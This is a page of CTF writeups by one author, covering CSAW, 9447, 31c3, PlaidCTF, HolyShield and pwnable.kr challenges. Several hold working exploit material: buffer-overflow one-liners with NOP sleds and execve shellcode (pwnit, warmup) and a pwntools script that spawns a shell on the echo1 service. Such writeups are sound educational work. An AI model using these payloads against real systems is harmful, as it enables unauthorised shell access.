Damotorie parksjin01
@parksjin01
parksjin01 / CSAW liaotian 2012 writeup.md
Created February 22, 2017 08:41
CSAW liaotian 2012

You can get the binary here.

The file name is Chinese, so I renamed it to liaotian (liaotian is the pronunciation of those Chinese characters).
It was really hard because this program prints Chinese instead of English, so I used Google Translate to understand it.

As with the previous problem, it is a socket program and it uses a signal to call the handling code.
I ran the program locally.

  • To solve this problem locally, first run the program with root privileges.
  • You also need a user named liaotian on your system.
@parksjin01
parksjin01 / CSAW exploitation-release 2012 writeup.md
Created February 22, 2017 03:42
CSAW exploitation1-release 2012

You can get the bin file here.

It's a really easy problem. All we need to do is supply the correct password.
If we send the correct password, the binary returns the contents of the key file (which is what we need). At 0x080489a4 there is a strcmp call
that compares our input with AAAAAAAAAAAAAAAAAAAAAAAAAA, so we can easily guess that the correct password is AAAAAAAAAAAAAAAAAAAAAAAAAA.

@parksjin01
parksjin01 / 9447-ctf 2014 europe writeup.md
Created February 21, 2017 07:31
9447-ctf 2014 europe1

You can get the program here.

The first problem is that executing the program crashes with a segfault in fscanf, because the program needs four files to run:

  • flag01: the answer we need to get
  • flag02: I don't know why this has to exist.
  • passwd: password for admin
  • salt: maybe the ID for admin

I created them myself.

@parksjin01
parksjin01 / CSAW 2011 Crypto8.md
Last active February 10, 2017 14:20
CSAW 2011 Crypto8

You can get the txt file here.
Solving this problem gives 300 points, which means it is harder than the previous ones.
I skimmed it and thought it was generated by a Caesar cipher, but that was wrong. Most of it reads like normal sentences, but they are slightly strange.
The text looks like this.

After shifting 4 steps the text is: AGAIM TE HASE WEAOMED QHAQ VRO QOAMPLIPPIVMP AOE BEIMG LVMIQVOED.
AP A OEPRWQ TE AOE CHAMGIMG QHE EMCOXUQIVM LEQHVD AGAIM. QHE MET KEX FVO MEUQ LEEQIMG TIWW BE UVWXGVM.
IQ IP ILUEOAQISE QHAQ XVR AWW AQQEMD AWW LEEQIMGP FOVL HEOE VM IM.

Now I will edit it by hand.

  • M -> N
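The hand-editing step above is a monoalphabetic substitution being solved one letter at a time. The helper below is an added example, not part of the writeup: it reproduces the "N steps" shift, ranks letter frequencies of the shifted text quoted above (embedded here as sample input), pairs them with the usual English order as a first guess, and applies a partial key while keeping unsolved letters uppercase so the remaining work stays visible. The only mapping taken from the writeup is M -> N; the frequency table is a generic heuristic, not a fact about this ciphertext.

```python
from collections import Counter

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# Typical English letter order, most to least frequent; used only as a first guess.
ENGLISH_ORDER = "ETAOINSHRDLCUMWFGYPBVKJXQZ"

# Sample input: the text quoted in the writeup after its 4-step shift.
CIPHERTEXT = (
    "AGAIM TE HASE WEAOMED QHAQ VRO QOAMPLIPPIVMP AOE BEIMG LVMIQVOED. "
    "AP A OEPRWQ TE AOE CHAMGIMG QHE EMCOXUQIVM LEQHVD AGAIM. "
    "QHE MET KEX FVO MEUQ LEEQIMG TIWW BE UVWXGVM. "
    "IQ IP ILUEOAQISE QHAQ XVR AWW AQQEMD AWW LEEQIMGP FOVL HEOE VM IM."
)


def caesar_shift(text, k):
    """Shift every letter by k positions (the 'N steps' operation); non-letters pass through."""
    out = []
    for ch in text:
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + k) % 26])
        else:
            out.append(ch)
    return "".join(out)


def letter_frequencies(text):
    """Return (letter, count) pairs, most frequent first, ties broken alphabetically."""
    counts = Counter(ch for ch in text if ch in ALPHABET)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def frequency_guess(text):
    """Pair the i-th most frequent cipher letter with the i-th most frequent English letter.
    Only a starting point: short texts deviate from the table, so confirm each guess by hand."""
    return [(c, e) for (c, _), e in zip(letter_frequencies(text), ENGLISH_ORDER)]


def check_key(key):
    """A substitution key must be injective: two cipher letters cannot decrypt to the same letter."""
    seen = {}
    for c, p in key.items():
        if p in seen:
            raise ValueError(f"{c} and {seen[p]} both map to {p}")
        seen[p] = c
    return key


def apply_partial_key(text, key):
    """Decrypt with a partial key. Solved letters are shown in lowercase, unsolved cipher
    letters stay uppercase, so what is left to guess is visible at a glance."""
    check_key(key)
    return "".join(key[ch].lower() if ch in key else ch for ch in text)


if __name__ == "__main__":
    print(frequency_guess(CIPHERTEXT)[:6])
    key = {"M": "N"}  # the first hand edit from the writeup
    print(apply_partial_key(CIPHERTEXT, key))
```

Re-running apply_partial_key after each new mapping is the loop the writeup performs by hand; check_key catches the common mistake of assigning one plaintext letter twice while guessing.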
@parksjin01
parksjin01 / 31c3-ctf-2014 cfy writeup.md
Last active January 12, 2017 07:21
31c3-ctf-2014 cfy writeup

You can get the binary at https://github.com/ctfs/write-ups-2014/tree/master/31c3-ctf-2014/pwn/cfy

First we find out how to change rip. We can change rip through the input option, which takes values like [0, 1, 2, 3].
Now we have to choose an approach. The first is to change rip directly to system. The other is to load shellcode and change rip to the shellcode address. I think calculating the shellcode address in this program is hard, so I chose to change rip directly to system. However, we can't change rip to system: the program reads the option as an int, and the address of system is outside that range.

So I will load a kind of shellcode into buf. I will write /bin//sh at the beginning of buf and the address of system after it. Why did I write /bin//sh first? Because we have to pass /bin//sh to system as its argument, and on x86-64 the first argument is passed in the rdi register; before the call rax there is a mov rdi, buf. We have to insert \x00\x00\x00\x00\x00\x00\x00\x00 between `/bin//sh

@parksjin01
parksjin01 / ####PlaidCTF pwn-200 ezhp writeup.md
Created January 6, 2017 09:16
PlaidCTF pwn-200 ezhp writeup

This program's vulnerability is heap-related: if we create a note, remove it, and then print it, the program segfaults.
We can't use disas main on this binary. I don't know why, but in any case main starts at 0x08048a48. The code of main looks like this:

   0x8048a48:	push   ebp
   0x8048a49:	mov    ebp,esp
   0x8048a4b:	and    esp,0xfffffff0
   0x8048a4e:	sub    esp,0x20
   0x8048a51:	mov    DWORD PTR [esp+0x1c],0x0
   0x8048a59:	jmp    0x8048aa9
   0x8048a5b:	call   0x80489eb
@parksjin01
parksjin01 / HolyShield7 pwnit writeup.md
Created January 5, 2017 12:53
HolyShield7 pwnit writeup

You can download the binary here.

This program has only ASLR as a memory protection.
We can load shellcode into the buffer and execute it to get a shell.

First I'll assume ASLR is turned off. Then the buffer address is fixed at 0xffffd620 (it may be different on your machine).
I'll use the shellcode from here.
I'll build the payload like this: NOP sled (21 bytes) + shellcode (23 bytes) + sfp + ret (0xffffd620)

(python -c 'print "2\n"+"\x90"*21+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"ABCD"+"\x20\xd6\xff\xff"+"3\n"';cat) | ./pwnit
@parksjin01
parksjin01 / CSAW-CTF-warmup-100 writeup.md
Last active March 16, 2017 20:47
CSAW-CTF-warmup-100 writeup

You can download the binary here.

As the title (warmup) says, it's really easy.
I'll assume there is no ASLR.
We have to call the easy function to get a shell.
We can call it with this payload:

(python -c 'print "a"*0x48+"\x0d\x06\x40\x00\x00\x00\x00\x00"';cat) | ./warmup
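The payload layouts used in the cfy, pwnit and warmup writeups above, as an added example that is not the author's code: it builds them with plain struct instead of python -c one-liners and checks each one for bytes the program's input path would swallow. The buffer address 0xffffd620, the return address 0x40060d and the 23-byte shellcode are the values quoted in the writeups; the system address used for cfy is a placeholder, because the cfy writeup does not give one.

```python
import struct


def p32(value):
    """Pack a 32-bit little-endian word (x86)."""
    return struct.pack("<I", value)


def p64(value):
    """Pack a 64-bit little-endian word (x86-64)."""
    return struct.pack("<Q", value)


# The 23-byte Linux/x86 execve("/bin//sh") shellcode quoted in the pwnit writeup.
SHELLCODE_X86 = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)


def ret2shellcode(buf_addr, shellcode, buf_len, sfp_len=4):
    """pwnit layout: a NOP sled plus the shellcode fill the buffer, the saved frame
    pointer is overwritten with filler, and the return address with the buffer address.
    Returning anywhere into the sled slides execution into the shellcode."""
    if len(shellcode) > buf_len:
        raise ValueError("shellcode does not fit in the buffer")
    sled = b"\x90" * (buf_len - len(shellcode))
    return sled + shellcode + b"A" * sfp_len + p32(buf_addr)


def ret2func(pad_len, func_addr):
    """warmup layout: pad up to the saved return address, then overwrite it with the
    address of the function we want to run (64-bit binary, so an 8-byte pointer)."""
    return b"a" * pad_len + p64(func_addr)


def system_in_buf(system_addr):
    """cfy layout as described in the writeup: the command string at the start of buf
    (mov rdi, buf makes it the first argument), 8 NUL bytes so system() reads a
    terminated C string, then the address of system for the call rax."""
    return b"/bin//sh" + b"\x00" * 8 + p64(system_addr)


def bad_bytes(payload, banned):
    """Offsets of bytes the input path would stop at: 0x0a for line-based readers
    such as the menu loops in pwnit and warmup, 0x00 for strcpy/strlen-style copies."""
    return [i for i, b in enumerate(payload) if b in banned]


if __name__ == "__main__":
    pwnit = ret2shellcode(0xffffd620, SHELLCODE_X86, buf_len=21 + 23)
    warmup = ret2func(0x48, 0x40060d)
    # 0x7ffff7a52390 is a placeholder for system()'s address, not a value from the writeup.
    cfy = system_in_buf(0x7ffff7a52390)
    for name, payload in (("pwnit", pwnit), ("warmup", warmup), ("cfy", cfy)):
        print(name, len(payload), payload.hex(), "newline at", bad_bytes(payload, b"\n"))
```

The writeups' one-liners are Python 2: in Python 3, print encodes a str as UTF-8 and corrupts bytes above 0x7f, so write the payload with sys.stdout.buffer.write instead. The trailing `; cat` keeps stdin open so the spawned shell does not exit as soon as the payload is consumed. To reproduce the pwnit run, which assumes ASLR is off, start the binary under `setarch $(uname -m) -R` rather than disabling randomize_va_space system-wide.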
@parksjin01
parksjin01 / CSAW-CTF-precision-100 writeup.md
Last active January 4, 2017 13:04
CSAW-CTF-precision-100 writeup

You can download the binary here.

First let's check how this program works.

It first prints where the buffer is located, then we type something,
and finally the program prints what we typed.
But if we type a string longer than 0x80 bytes, the program just prints NOPE instead of what we typed.

Now let's get a shell from this program. I think this program has ASLR as a memory protection; however, it prints the buffer address in the first

@parksjin01
parksjin01 / pwnable.kr echo1 writeup.md
Created January 2, 2017 12:34
pwnable.kr echo1 writeup
from pwn import *

proc = remote("pwnable.kr", 9010)
# First line is the "name"; it lands at 0x6020a0 (the return address used below), so store a "jmp rsp" stub there.
proc.sendline(asm("jmp rsp", arch="amd64", os="linux"))
proc.sendline(b"1")  # menu choice 1: the echo with the stack overflow
# 27-byte execve("/bin/sh") shellcode: movabs/neg rbx builds "/bin/sh\0" on the stack, then syscall 0x3b.
shellcode = (b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
             b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")
# 40 bytes of padding reach the saved return address; after ret, rsp points at the shellcode (bytes, not str, for Python 3).
proc.sendline(b"a" * 40 + p64(0x6020a0) + shellcode)
proc.interactive()